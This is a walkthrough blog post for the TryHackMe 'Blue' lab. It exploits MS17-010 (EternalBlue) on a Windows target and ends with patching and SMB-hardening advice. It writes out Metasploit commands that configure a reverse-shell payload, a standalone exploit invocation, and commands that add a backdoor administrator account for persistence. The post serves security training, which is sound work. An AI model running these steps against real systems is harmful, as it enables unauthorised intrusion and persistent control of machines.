Back to All Posts
TryHackMe — Blue

TryHackMe — Blue

Gage OlsonGage OlsonCybersecurity Practitioner
thm
walkthrough
windows
eternalblue

TryHackMe — Blue Walkthrough

Machine Information

  • Platform: TryHackMe
  • Machine: Blue
  • Difficulty: Easy
  • OS: Windows
  • Focus: Windows exploitation, SMB vulnerabilities

Initial Reconnaissance

Nmap Scan

Start with a comprehensive nmap scan:

bash
nmap -sC -sV -O -A -p- 10.10.10.10

Key findings:

  • Port 135: RPC
  • Port 139: NetBIOS
  • Port 445: SMB
  • Port 49152-49157: RPC

SMB Enumeration

Check SMB version and shares:

bash
smbclient -L //10.10.10.10
smbclient -L //10.10.10.10 -N

Vulnerability Assessment

EternalBlue Detection

Check for MS17-010 (EternalBlue) vulnerability:

bash
nmap --script smb-vuln-ms17-010 10.10.10.10

Exploitation

Using Metasploit

  1. Start Metasploit:
bash
msfconsole
  1. Search for EternalBlue exploit:
bash
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
  1. Configure the exploit:
bash
set RHOSTS 10.10.10.10
set LHOST tun0
set payload windows/x64/shell/reverse_tcp
exploit

Manual Exploitation

Alternative using standalone exploit:

bash
python2 eternalblue_exploit.py 10.10.10.10 shellcode.bin

Post-Exploitation

System Information

cmd
systeminfo
whoami
net user

Privilege Escalation

Check for additional vulnerabilities:

cmd
wmic qfe get hotfixid

Persistence

Create a backdoor user:

cmd
net user hacker Password123! /add
net localgroup administrators hacker /add

Key Learning Points

  1. SMB Vulnerabilities: Understanding SMB protocol weaknesses
  2. EternalBlue: How to exploit MS17-010 vulnerability
  3. Windows Enumeration: Techniques for Windows system reconnaissance
  4. Metasploit Usage: Effective use of exploitation framework

Mitigation Strategies

  1. Patch Management: Keep Windows systems updated
  2. Network Segmentation: Isolate vulnerable systems
  3. SMB Hardening: Disable SMBv1, restrict SMB access
  4. Monitoring: Implement network monitoring for SMB traffic

Tools Used

  • Nmap: Network scanning and enumeration
  • SMBClient: SMB protocol interaction
  • Metasploit: Exploitation framework
  • John the Ripper: Password cracking

Conclusion

This walkthrough demonstrates the importance of:

  • Regular system patching
  • Network security monitoring
  • Understanding common attack vectors
  • Proper system hardening

The EternalBlue vulnerability serves as a reminder of how unpatched systems can be easily compromised, emphasizing the need for robust patch management and security monitoring.

    TryHackMe — Blue